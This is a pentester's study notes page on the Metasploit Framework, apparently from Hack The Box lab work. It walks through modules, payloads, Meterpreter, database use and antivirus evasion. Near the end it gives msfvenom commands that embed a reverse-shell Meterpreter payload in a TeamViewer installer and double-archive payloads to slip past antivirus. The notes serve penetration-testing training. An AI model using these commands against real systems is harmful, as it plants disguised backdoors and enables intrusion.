πMetasploit Framework
A ruby based pen testing platform that allows you to write, test and execute exploits for various systems. By default all files reiside in /usr/share/metasploit-framework
MSF Engagement Structure
Divided into five categories
Enumeration
Preparation
Exploitation
Privilege Escalation
Post Exploitation

Starting Up
We can run msfconsole
to start Metasploit
-q
Quiet options, displays without banner
Modules
These are split into categories. They consist of exploits that are POCs that can be used to exploit common vulnerabilities in an automated manner.
There are many types of modules, these include
Auxiliary - Scanning, fuzzing
Exploits - Exploit a vulnerability
Post - Gather information and pivot deeper
Encoders - Ensure payloads are intact to their destination
etc.
We can search for a module and then use it by using:
search <name>
search <name> type:<exploit-type>
use <module-name>
use <module-number>
We can see more about the selected module with the info
command
Once happy we can use show options
to see all required parameters, and then set them with set <option> xxxxx
For example:
set RHOSTS 10.10.xx.x
setg RHOSTS 10.10.xx.x
- sets a value until the program is closed
Targets
Unique OS identifiers are taken from the version of OS that is selected for the exploit module. The show targets
command show displays all vulnerable targets for the selected module.
show targets
Available targets:
Id Name
-- ----
0 Automatic
1 IE 7 on Windows XP SP3
2 IE 8 on Windows XP SP3
3 IE 7 on Windows Vista
4 IE 8 on Windows Vista
5 IE 8 on Windows 7
6 IE 9 on Windows 7
set target 2
Payloads
Sent with the exploit to typically return a reverse connection to the attacker to establish a foothold.
Singles
Contains the exploit and shellcode. Designed to be more stable and are self-contained.
Stagers
Small and reliable they are used to perform a specific task. It waits on the attacker machine, ready to connect to the victim host once the stage is complete .
Used to set up a network connection between the attacker and victim. Metasploit will try the best payload and then revert to another one if necessary.
Stages
Payload components that are downloaded through a stagers module.
Provide advanced features with no limits such as a Meterpreter, they automatically use middle stagers.
Staged
Exploitation process that is modularized into different functions. Ultimately grants an attacker remote access to a machine if the stages work correctly.
Stage0
Stage0
The initial shellcode is sent over the network to the target which will connect back to our machine if successful. Common names include
reverse_tcp
reverse_https
bind_tcp
Stage1
Stage1
Meterpreter Payload
Resides completely in the memory of a remote host meaning no trace is left behind making it very hard to detect.
Once the payload is executed a new session is created spawning a meterpreter interface. This lets us load in plugins and offers us a host of options against the target:
show payloads
grep <payload-name> show payloads
: For more control over the search
set payload <payload>
Encoders
Makes payloads compatible with different processor architectures and can help avoid anti-virus detection.
show encoders
msfvenom -a x86 --platform windows -p <PAYLOAD> LHOST=xxx LPORT=xxx -b "\x00 -f perl -e x64/shikata_ga_nai
We can use msf-virustotal
with an API key to analyze our payloads.
msf-virustotal -k <API-key> -f exp.exe
Databases
Used to store all our results from entry points, issues and discovered credentials to name but a few. We can manage all the hosts we have analyzed.
The databases can also both be exported and imported.
First, make sure DB is setup
sudo service postgresql status
Then start the service
sudo systemctl start postgresql
Now we can create a new DB
sudo msfdb init
Check to see the status of the current DB
sudo msfdb status
Finally, we can start msfconsole and connect to the DB
sudo msfdb run
Workspaces
Like folders in a project, we can use them to sort results of scans, hosts and other information, like extracted IPs, subnets, networks or domains.
workspace
-a
: add-d
: deleteworkspace -a Target_1
Importing scan results
db_import <scan.nmap>
If we run hosts
we can see a table of the host address IP, OS and other options
If we run services
we can see a table of all the services by port and name
db_nmap -sV -sS <IP>
Data Backup
db_export -f xml backup.xml
Credentials
Show you all credentials gathered from the target. We can also add credentials manually.
creds
creds -h
Loot
Shows all loot (hash dumps, passwords, shadow files)
loot
Plugins
Allow us more flexibility using the msfconsole
as they can be loaded in to provide us with extra functionality during an assessment.
We can download and install new plugins, for example, the DarkOperator Plugin suite:
git clone https://github.com/darkoperator/Metasploit-Plugins
sudo cp ./Metasploit-Plugins/pentest.rb /usr/share/metasploit-framework/plugins/pentest.rb
A list of useful ones:
load nessus
load mimikatz
load railgun
load priv
Tools
Command line utilities that can be called from the msfconsole menu
Sessions
Msfconsole can manage multiple modules at once and this means we can have many sessions and switch between them as we wish.
sessions
: Lists all active sessionsessions -i <session-num>
: Loads session by numberbg
: Background the current session
Some modules will require a session to be set as a parameter
Jobs
We use this to look at currently active tasks running in the background and can terminate old ones to free up ports.
jobs
exploit -j
: Runs exploit as background job
jobs -l
: Lists running jobs
Meterpreter
Looking at system processes
Network configurations
Taking screenshots
Capturing keystrokes
Taking over the victim's web camera
Helpful commands:
getsystem
= Attempts to elevate the privilege of the systemhashdump
= Dumps contents of the SAM database?
= Help commandupload
download
= Uploads/ Downloads file
It is stealthy to use, not only does it reside in memory and write nothing to the dick it now uses encryption (AES) to ensure confidentiality of data.
We can search, use and configure our exploit and payload as shown in the above sections.
Be aware that due to permission if we upload something as a payload we may not be able to remove it from the target leaving evidence that the target was compromised!
Writing and Importing Modules
If we find we are missing a certain module we can download it from exploitdb
searchsploit <exploit-name>
searchsploit -t <exploit-name> --exclude="<.ext>"
FILENAME => x.rb
cp ~/Downloads/x.rb /usr/share/metasploit-framework/modules/exploits/unix/webapp/x.rb
msfconsole -m /usr/share/metasploit-framework/modules/
loadpath /usr/share/metasploit-framework/modules/
reload_all
Msfvenom
We can use Ncat as our listener or get a Meterpreter shell by using Metasploit, as shown below.

Once we've got a shell we can run
run post/multi/recon/local_exploit_suggester
This will give some suggestions on how further to exploit the machine.
We can also search for an exploit suggester outside of the session
search local exploit suggester
Firewall and IDS/IPS Evasion
Endpoint Protection
Refers to a localized device whose purpose it to protect a single host. Usually Antivirus or Antimalware Protection, Firewall and Anti DDOS are in one package.
BitDefender
Malwarebytes
Perimeter Protection
A physical or virtual device on the network perimiter edge. They provide access inside of a network from the outside (public to private).
Evasion Techniques
Most AVs rely on Signiture-based detection to detect malicious code inside of software. When unknown software is detected by AV software it is quarantined.
Embedding
We can use msfvenom to embed a payload inside of a legitimate .exe
file, this hides the payload shell code deep inside the software lowering our detection chances.
Let's do this with TeamViewer_Setup.exe
msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5
Archives
Archiving a file, script, folder, executable, picture or any other content can help bypass AV scanning.
msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -e x86/shikata_ga_nai -a x86 --platform windows -o ~/test.js -i 5
Archiving it twice will lead to even lower detection rates from AVs
wget https://www.rarlab.com/rar/rarlinux-x64-612.tar.gz
Daikuru@htb[/htb]$ tar -xzvf rarlinux-x64-612.tar.gz && cd rar
Daikuru@htb[/htb]$ rar a ~/test.rar -p ~/test.js
Remove .RAR
mv test.rar test
Archive payload again
rar a test2.rar -p test
Remove .RAR again
mv test2.rar test2
Packers
Executable compression process where the payload is packed together with an .exe program and the decompression code in one file. When we run the decompression code and return a backdoored executable to its initial state, allowing for an even higher chance of evasion from AVs.
UPX packer
MPRESS
MEW
ExeStealth
Last updated
Was this helpful?